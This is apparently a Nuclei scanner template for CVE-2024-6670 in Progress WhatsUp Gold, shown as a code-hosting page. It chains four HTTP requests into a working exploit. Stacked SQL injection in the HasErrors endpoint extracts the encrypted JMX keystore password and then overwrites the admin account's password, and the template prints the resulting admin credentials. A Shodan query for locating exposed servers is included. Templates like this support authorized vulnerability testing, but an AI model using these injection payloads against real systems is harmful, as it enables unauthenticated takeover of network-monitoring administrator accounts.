118 lines
3.5 KiB
YAML
118 lines
3.5 KiB
YAML
id: CVE-2024-6670
|
|
|
|
info:
|
|
name: WhatsUp Gold HasErrors SQL Injection - Authentication Bypass
|
|
author: DhiyaneshDK,princechaddha
|
|
severity: critical
|
|
description: |
|
|
In WhatsUp Gold versions released before 2024.0.0, a SQL Injection vulnerability allows an unauthenticated attacker to retrieve the users encrypted password.
|
|
reference:
|
|
- https://community.progress.com/s/article/WhatsUp-Gold-Security-Bulletin-August-2024
|
|
- https://www.progress.com/network-monitoring
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2024-6670
|
|
cwe-id: CWE-89
|
|
epss-score: 0.00043
|
|
epss-percentile: 0.09569
|
|
metadata:
|
|
verified: true
|
|
max-request: 4
|
|
shodan-query: title:"WhatsUp Gold" http.favicon.hash:-2107233094
|
|
tags: cve,cve2024,whatsup-gold,auth-bypass,sqli,intrusive
|
|
|
|
flow: |
|
|
http(1);
|
|
http(2);
|
|
http(3);
|
|
encryptedPassword = template.encryptedPassword
|
|
const cleanedInput = encryptedPassword.replace('psyduck', '').match(/\d+/g);
|
|
const hexValues = cleanedInput.map(value => {
|
|
const num = parseInt(value);
|
|
return isNaN(num) ? '00' : num.toString(16).padStart(2, '0');
|
|
});
|
|
log(hexValues);
|
|
const hexString = hexValues.join('');
|
|
const varbinaryString = '0x' + hexString;
|
|
set("encryptedPassword", varbinaryString);
|
|
http(4);
|
|
|
|
variables:
|
|
username: "admin"
|
|
password: "{{to_lower(rand_text_alpha(5))}}"
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /NmConsole/WugSystemAppSettings/JMXSecurity HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/json
|
|
|
|
{"KeyStorePassword": "{{password}}", "TrustStorePassword": "{{password}}"}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- status_code == 302
|
|
- contains(set_cookie, 'ASP.NET_SessionId=')
|
|
condition: and
|
|
internal: true
|
|
|
|
- raw:
|
|
- |
|
|
POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/json
|
|
|
|
{"deviceId": "22222", "classId": "DF215E10-8BD4-4401-B2DC-99BB03135F2E';UPDATE ProActiveAlert SET sAlertName='psyduck'+( SELECT sValue FROM GlobalSettings WHERE sName = '_GLOBAL_:JavaKeyStorePwd');--", "range": "1", "n": "1", "start": "3", "end": "4", "businesdsHoursId": "5"}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- status_code == 200
|
|
- contains(content_type, 'application/json')
|
|
condition: and
|
|
internal: true
|
|
|
|
- raw:
|
|
- |
|
|
GET /NmConsole/Platform/Filter/AlertCenterItemsReportThresholds HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- status_code == 200
|
|
- contains(body, 'DisplayName')
|
|
condition: and
|
|
internal: true
|
|
|
|
extractors:
|
|
- type: regex
|
|
internal: true
|
|
name: encryptedPassword
|
|
regex:
|
|
- '"psyduck\d+(,\d+)*"'
|
|
|
|
- raw:
|
|
- |
|
|
POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/json
|
|
|
|
{"deviceId": "22222", "classId": "DF215E10-8BD4-4401-B2DC-99BB03135F2E';UPDATE WebUser SET sPassword = {{encryptedPassword}} where sUserName = 'admin';--", "range": "1", "n": "1", "start": "3", "end": "4", "businesdsHoursId": "5"}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- status_code == 200
|
|
- contains(content_type, 'application/json')
|
|
condition: and
|
|
|
|
extractors:
|
|
- type: dsl
|
|
dsl:
|
|
- '"USER: "+ username'
|
|
- '"PASS: "+ password'
|